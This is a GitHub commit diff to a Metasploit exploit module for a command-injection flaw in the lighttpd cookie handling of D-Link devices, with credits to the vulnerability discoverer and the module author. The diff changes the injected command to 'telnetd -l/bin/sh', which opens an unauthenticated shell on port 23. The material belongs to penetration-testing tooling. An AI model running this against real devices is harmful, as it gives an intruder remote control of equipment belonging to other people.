File tree Expand file tree Collapse file tree 1 file changed +5
-7
lines changed
modules/exploits/linux/http Expand file tree Collapse file tree 1 file changed +5
-7
lines changed Original file line number Diff line number Diff line change @@ -18,11 +18,12 @@ def initialize(info = {})
18
18
This module exploits an anonymous remote code execution vulnerability on different D-Link
19
19
devices. The vulnerability is a command injection in the cookie handling process of the
20
20
lighttpd web server when handling specially crafted cookie values. This module has been
21
- successfully tested on D-Link DSP-W110A1_FW105B01 in an emulated environment.
21
+ successfully tested on D-Link DSP-W110A1_FW105B01 in emulated environment and on the real
22
+ device.
22
23
} ,
23
24
'Author' =>
24
25
[
25
- 'Peter Adkins' , # vulnerability discovery and initial PoC
26
+ 'Peter Adkins <peter.adkins[at]kernelpicnic.net>' , # vulnerability discovery and initial PoC
26
27
'Michael Messner <devnull[at]s3cur1ty.de>' , # Metasploit module
27
28
] ,
28
29
'License' => MSF_LICENSE ,
@@ -67,12 +68,9 @@ def exploit
67
68
68
69
print_status ( "#{ peer } - Exploiting..." )
69
70
70
- telnetport = rand ( 32767 ) + 32768
71
-
72
- cmd = "telnetd -p #{ telnetport } "
73
-
71
+ cmd = "telnetd -l/bin/sh"
74
72
execute_command ( cmd )
75
-
73
+ telnetport = 23
76
74
handle_telnet ( telnetport )
77
75
end
78
76
You can’t perform that action at this time.
0 commit comments